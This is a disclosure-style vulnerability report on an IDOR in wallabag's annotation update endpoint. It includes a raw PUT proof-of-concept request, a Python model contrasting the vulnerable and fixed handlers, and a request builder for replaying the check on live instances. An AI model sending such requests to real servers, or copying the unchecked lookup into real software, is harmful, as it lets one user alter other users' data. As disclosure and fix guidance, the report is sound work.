Description
An Insecure Direct Object Reference (IDOR) was discovered in wallabag's annotation API. The PUT /annotations/{id} endpoint updates the annotation identified by the URL without checking that it belongs to the authenticated user, so any logged-in user can modify another user's annotation by guessing or enumerating its ID.
Proof of Concept
- Log in as the victim.
- Create an entry and an annotation. In this case the annotation's ID is 3.
- Log in as the attacker (a different account, with its own session cookie).
- As the attacker, send the following request, referencing the victim's annotation ID.
Request:
PUT /annotations/3 HTTP/1.1
Host: localhost:8000
Cookie: PHPSESSID=e23e2dfc1b530c1884bf17248448b979
Content-Length: 21

{"id":3,"text":"xxx"}
- The victim's annotation created in step 2 is updated to the attacker-supplied text "xxx", even though the attacker's session does not own it.
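The steps above, as an added example that is not wallabag's own code: a small in-memory model of the PUT /annotations/{id} handler in the reported form (lookup by ID only) and in a hardened form (lookup scoped to the session's user), plus a builder for the raw request shown in the report so the same check can be replayed against a live instance. The user IDs, annotation texts and store are constructed for the example; the handler names are hypothetical and do not correspond to wallabag's controller.

```python
"""IDOR reproduction and fix model for an annotation update endpoint.

Added example, not wallabag code. The two handlers below stand in for
PUT /annotations/{id}: one trusts the id from the URL (the reported
behaviour), the other refuses to touch rows the caller does not own.
"""
import json
from dataclasses import dataclass, field


@dataclass
class Annotation:
    id: int
    user_id: int
    text: str


@dataclass
class Store:
    """In-memory stand-in for the annotation table (constructed for the example)."""
    rows: dict = field(default_factory=dict)
    next_id: int = 1

    def create(self, user_id, text):
        ann = Annotation(self.next_id, user_id, text)
        self.rows[ann.id] = ann
        self.next_id += 1
        return ann


def put_annotation_vulnerable(store, session_user_id, annotation_id, body):
    """Reported behaviour: the row is found by id alone, ownership is never checked."""
    ann = store.rows.get(annotation_id)
    if ann is None:
        return 404, {"error": "not found"}
    ann.text = body["text"]
    return 200, {"id": ann.id, "text": ann.text}


def put_annotation_fixed(store, session_user_id, annotation_id, body):
    """Hardened variant: the lookup is scoped to the caller, so a foreign id reads as absent."""
    ann = store.rows.get(annotation_id)
    if ann is None or ann.user_id != session_user_id:
        # 404 rather than 403 so the response does not confirm that the id exists.
        return 404, {"error": "not found"}
    ann.text = body["text"]
    return 200, {"id": ann.id, "text": ann.text}


def reproduce(handler):
    """Replays the report's steps against a handler; returns (status, victim text after)."""
    store = Store()
    victim, attacker = 1, 2            # hypothetical user ids
    store.create(victim, "first")
    store.create(victim, "second")
    target = store.create(victim, "victim's note")   # gets id 3, as in the report
    status, _ = handler(store, attacker, target.id, {"id": target.id, "text": "xxx"})
    return status, store.rows[target.id].text


def raw_put_request(host, session_id, annotation_id, text):
    """Builds the report's request with a correctly computed Content-Length."""
    body = json.dumps({"id": annotation_id, "text": text}, separators=(",", ":"))
    return (
        f"PUT /annotations/{annotation_id} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: PHPSESSID={session_id}\r\n"
        f"Content-Length: {len(body.encode())}\r\n"
        "\r\n"
        f"{body}"
    )


if __name__ == "__main__":
    print("vulnerable handler:", reproduce(put_annotation_vulnerable))
    print("fixed handler:     ", reproduce(put_annotation_fixed))
    print(raw_put_request("localhost:8000", "e23e2dfc1b530c1884bf17248448b979", 3, "xxx"))
```

Against the vulnerable handler the attacker's PUT returns 200 and the victim's row now reads "xxx"; against the fixed handler it returns 404 and the row is untouched. To check a real instance, send the output of raw_put_request with the attacker's PHPSESSID and then read the annotation back with the victim's session: if the text changed, the ownership check is missing.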